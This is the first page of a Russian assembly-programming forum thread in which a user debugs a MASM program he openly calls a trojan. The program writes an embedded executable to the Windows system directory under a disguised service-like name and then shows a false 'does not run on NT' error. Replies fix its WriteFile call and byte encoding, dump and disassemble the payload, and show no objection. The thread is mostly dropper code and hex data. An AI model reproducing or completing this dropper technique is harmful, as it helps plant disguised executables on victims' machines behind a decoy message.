WriteFile

Тема в разделе "WASM.BEGINNERS", создана пользователем fragment, 11 май 2010.

Статус темы:
Закрыта.
Страница 1 из 8
  1. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Непонимаю почему функция возвращает в eax null. Вроде все написано правельно..

    Код (Text):
    1. http://codepad.org/CrqrrU5l
    Код (Text):
    1. .586p
    2. .model flat,stdcall
    3. option casemap:none
    4.  
    5. includelib  ./lib/kernel32.lib
    6. includelib  ./lib/user32.lib
    7.  
    8. .code
    9. start:
    10.  
    11. GetSystemDirectoryA PROTO :DWORD,:DWORD
    12. push 260h
    13. push offset Buff_1
    14. call GetSystemDirectoryA
    15.  
    16. .data?
    17. Buff_1 db 260h dup(?)
    18. hFile dd ?
    19.  
    20. .data
    21. exename  db "/nvssvc.exe",0
    22.  
    23. .code
    24.  
    25. lstrcatA PROTO :DWORD,:DWORD
    26. push offset exename
    27. push offset Buff_1
    28. call lstrcatA
    29.  
    30. CreateFileA PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
    31. push 0h
    32. push 0h
    33. push 2h
    34. push 0h
    35. push 1h+2h
    36. push 80000000h+40000000h
    37. push offset Buff_1
    38. call CreateFileA
    39.  
    40. mov hFile,eax
    41.  
    42. WriteFile PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
    43. push 0h
    44. push 0h
    45. push TrojanLen
    46. push offset Trojan
    47. push eax
    48. call WriteFile
    49.  
    50. CloseHandle PROTO :DWORD
    51. push hFile
    52. call CloseHandle
    53.  
    54. .data
    55. MessBoxA db "Программа не работает на платформе NT.",0
    56.  
    57. .code
    58. MessageBoxA PROTO :DWORD,:DWORD,:DWORD,:DWORD
    59. push 00000030h
    60. push 0h
    61. push offset MessBoxA
    62. push 0h
    63. call MessageBoxA
    64.  
    65. ExitProcess PROTO :DWORD
    66. call ExitProcess
    67.  
    68. .data
    69. TrojanLen equ 3040h
    70.  
    71. Trojan  db "6A306A00"
    72.         db "68003040"
    73.         db "006A00E8"
    74.         db "0C000000"
    75.         db "E8010000"
    76.         ...
    77.         db "00000000"
    78.  
    79. end start
    [​IMG]
     
    fragment, 11 май 2010
    #1
  2. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Hex доставал так:

    [​IMG]

    Код (Text):
    1. Код любезно был написан для меня человеком с никнэймом [b]aitap[/b] с [b]irc.ru # linux[/b]
    2.  
    3. #!perl
    4.  
    5. print 'Trojan';
    6.  
    7. $i = 0;
    8.  
    9. while (<>) {
    10.     $out = substr $_,16,48;
    11.     $out =~ s/ //g;
    12.     $i += length $out;
    13.     for (1..((length $out)/8)) {
    14.         print "\tdb \"".substr ($out,($_*8-8),8)."\",\n";
    15.     }
    16. }
    17.  
    18. print STDERR "$i$/";
    C:\>perl.exe 1.pl 1.txt
     
    fragment, 11 май 2010
    #2
  3. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Немогу понять где я допустил ошибку, фаил создается но размер его нулевой , почему... да я еще забил 4 дворда с неинициализироваными даннаыми нулями в дампе программы , это правельно или нужно был зделать db 8 (?) вместо db "00000000"

    [​IMG]
     
    fragment, 11 май 2010
    #3
  4. Flint_ta

    Flint_ta New Member

    Публикаций:
    0
    Регистрация:
    25 май 2008
    Сообщения:
    312
    Код (Text):
    1. PUSH 0                                               ; |/pOverlapped
    2. PUSH offset pBytesWritten                     ; ||pBytesWritten <<<<<<<<<<<<<<<<<<<<<<
    3. PUSH 3040h                                         ; ||nBytesToWrite
    4. PUSH offset Trojan                                ; ||Buffer
    5. PUSH EAX                                            ; ||hFile
    6. CALL WriteFile
    У тебя 0 вместо переменной, в которой будет хранится кол-во байт которое записали (pBytesWritten), также в имени файла /nvssvc.exe замени на \nvssvc.exe
     
    Flint_ta, 11 май 2010
    #4
  5. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    на сколько я понял из msdn это опционально можно поставить и null тогда значение возвращено не будет , или я гулбоко заблуждаюсь
     
    fragment, 11 май 2010
    #5
  6. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Добавил адресс буффера для кол-во записаных байт но фаил всеравно получается нулевой длинны.
     
    fragment, 11 май 2010
    #6
  7. Clerk

    Clerk Забанен

    Публикаций:
    0
    Регистрация:
    4 янв 2008
    Сообщения:
    6.689
    Адрес:
    РБ, Могилёв
    Предпоследний параметр не следует обнулять, может быть исключение. Касательно ошибки - справо показан код ошибки: ERROR_INVALID_USER_BUFFER. Это эквивалент ядерной STATUS_INVALID_USER_BUFFER, когда в ядре прифайловых операциях возникает #AV. Собственно вы указали размер буфера более чем сам буфер, происходит вызод за его пределы - 0x3040, наверно выход за пределы модуля. Вот вам хидеры http://indy-vx.narod.ru/Temp/nterr.zip
    По мойму рано вы за это взялись.
     
    Clerk, 11 май 2010
    #7
  8. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    http://programmersforum.ru/attachment.php?attachmentid=25013&stc=1&d=1273589048
     
    fragment, 11 май 2010
    #8
  9. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Может быть рано но я просто тренируюсь.
    Я не савсем понял, длинна нужного дампа составляет 3040 байт , заявленая длинаа 3040, какие могут тут быть исключения ? :)
    В ваших хедер файлах я "слегка" неразобрался.
    Как же мне всетакие поправить свою программу , что я не так посчитал размер дампа нужного мне Пе файла?
     
    fragment, 11 май 2010
    #9
  10. Flint_ta

    Flint_ta New Member

    Публикаций:
    0
    Регистрация:
    25 май 2008
    Сообщения:
    312
    Не правильно записан дамп

    db "6A306A00"
    db "68003040"
    db "006A00E8"
    db "0C000000"
    db "E8010000"

    Кавычки говорят о том что эти данные будут в виде текста,
    а должны быть в виде байтов типа этого:

    db 06Ah, 030h, 06Ah, 000h, 068h, 000h, 030h, 040h, 000h, 06Ah, 000h, 0E8h, 00Ch, 000h, 000h, 000h
    db 0E8h, 001h, 000h, 000h, 000h, 0CCh, 0FFh, 025h, 000h, 020h, 040h, 000h, 0FFh, 025h, 008h, 020h
     
    Flint_ta, 11 май 2010
    #10
  11. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Огромное спасибо а почему у вас записано по 3 байта? можно записывать по 8?
     
    fragment, 11 май 2010
    #11
  12. Flint_ta

    Flint_ta New Member

    Публикаций:
    0
    Регистрация:
    25 май 2008
    Сообщения:
    312
    Вот твой дамп
    Код (Text):
    1. db 06Ah, 030h, 06Ah, 000h, 068h, 000h, 030h, 040h, 000h, 06Ah, 000h, 0E8h, 00Ch, 000h, 000h, 000h
    2. db 0E8h, 001h, 000h, 000h, 000h, 0CCh, 0FFh, 025h, 000h, 020h, 040h, 000h, 0FFh, 025h, 008h, 020h
    3. db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    4. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    5. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    6. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    7. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    8. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    9. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    10. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    11. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    12. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    13. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    14. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    15. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    16. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    17. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    18. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    19. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    20. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    21. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    22. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    23. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    24. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    25. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    26. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    27. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    28. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    29. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    30. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    31. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    32. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    33. db 05Ch, 020h, 000h, 000h, 000h, 000h, 000h, 000h, 078h, 020h, 000h, 000h, 000h, 000h, 000h, 000h
    34. db 04Ch, 020h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 06Ah, 020h, 000h, 000h
    35. db 000h, 020h, 000h, 000h, 054h, 020h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    36. db 086h, 020h, 000h, 000h, 008h, 020h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    37. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 05Ch, 020h, 000h, 000h
    38. db 000h, 000h, 000h, 000h, 078h, 020h, 000h, 000h, 000h, 000h, 000h, 000h, 09Bh, 000h, 045h, 078h
    39. db 069h, 074h, 050h, 072h, 06Fh, 063h, 065h, 073h, 073h, 000h, 06Bh, 065h, 072h, 06Eh, 065h, 06Ch
    40. db 033h, 032h, 02Eh, 064h, 06Ch, 06Ch, 000h, 000h, 0B1h, 001h, 04Dh, 065h, 073h, 073h, 061h, 067h
    41. db 065h, 042h, 06Fh, 078h, 041h, 000h, 075h, 073h, 065h, 072h, 033h, 032h, 02Eh, 064h, 06Ch, 06Ch
    42. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    43. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    44. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    45. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    46. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    47. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    48. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    49. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    50. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    51. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    52. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    53. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    54. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    55. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    56. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    57. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    58. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    59. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    60. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    61. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    62. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    63. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    64. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    65. db 044h, 072h, 069h, 076h, 065h, 072h, 020h, 067h, 06Eh, 075h, 05Fh, 06Fh, 070h, 065h, 06Eh, 077h
    66. db 061h, 072h, 065h, 02Dh, 030h, 02Eh, 037h, 038h, 034h, 02Eh, 073h, 079h, 073h, 020h, 06Fh, 072h
    67. db 020h, 068h, 069h, 067h, 068h, 065h, 072h, 020h, 06Eh, 06Fh, 074h, 020h, 066h, 06Fh, 075h, 06Eh
    68. db 064h, 02Eh, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    69. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    70. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    71. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    72. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    73. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    74. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    75. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    76. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    77. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    78. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    79. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    80. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    81. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    82. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    83. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    84. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    85. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    86. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    87. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    88. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    89. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    90. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    91. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    92. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    93. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    94. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    95. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    96. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
    1408 байт = 580h байт
     
    Flint_ta, 11 май 2010
    #12
  13. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    простите не по однаму а по 4 ?
     
    fragment, 11 май 2010
    #13
  14. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    ага спасибо а не могли бы вы привести скрипт каторым вы так это красиво сделали?
    но тем не меняие программа не запускается, почему, что её не хватает?
    [​IMG]
     
    fragment, 11 май 2010
    #14
  15. Flint_ta

    Flint_ta New Member

    Публикаций:
    0
    Регистрация:
    25 май 2008
    Сообщения:
    312
    Потому что, это не программа, точнее не вся. Не хватает хидера )) По сути все что делает эта программа это выводит сообщение "Driver gnu_openware-0.784.sys or higher not found."
     
    Flint_ta, 11 май 2010
    #15
  16. Clerk

    Clerk Забанен

    Публикаций:
    0
    Регистрация:
    4 янв 2008
    Сообщения:
    6.689
    Адрес:
    РБ, Могилёв
    fragment
    Это не PE-образ, а выдранный из образа код какойто:
    Код (Text):
    1. $ ==>    00402000                               6A 30                     push 30
    2. $+2      00402002                               6A 00                     push 0
    3. $+4      00402004                               68 00304000               push t1.00403000
    4. $+9      00402009                               6A 00                     push 0
    5. $+B      0040200B                               E8 0C000000               call t1.0040201C
    6. $+10     00402010                               E8 01000000               call t1.00402016
    7. $+15     00402015                               CC                        int3
    8. $+16     00402016                             - FF25 00204000             jmp dword ptr ds:[402000]
    9. $+1C     0040201C                             - FF25 08204000             jmp dword ptr ds:[402008]
    Ссылки вникуда соответственно.
     
    Clerk, 11 май 2010
    #16
  17. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Видемо что-то не впорядке с stub?
     
    fragment, 11 май 2010
    #17
  18. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    получается что-то на подобии шелл кода а мне нужен полный PE с головой , как это зделать , в распоряжении имею IDAPro Free и Ollydbg 2
     
    fragment, 11 май 2010
    #18
  19. Flint_ta

    Flint_ta New Member

    Публикаций:
    0
    Регистрация:
    25 май 2008
    Сообщения:
    312
    http://ifolder.ru/17664302
     
    Flint_ta, 11 май 2010
    #19
  20. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    я все понимаю конечно но ето моя программа и она запусается я спрашиваю почему у меня отвалилась голова от PE файла ? Где можно посматреть полный дамп программы?
     
    fragment, 11 май 2010
    #20
Страница 1 из 8
Статус темы:
Закрыта.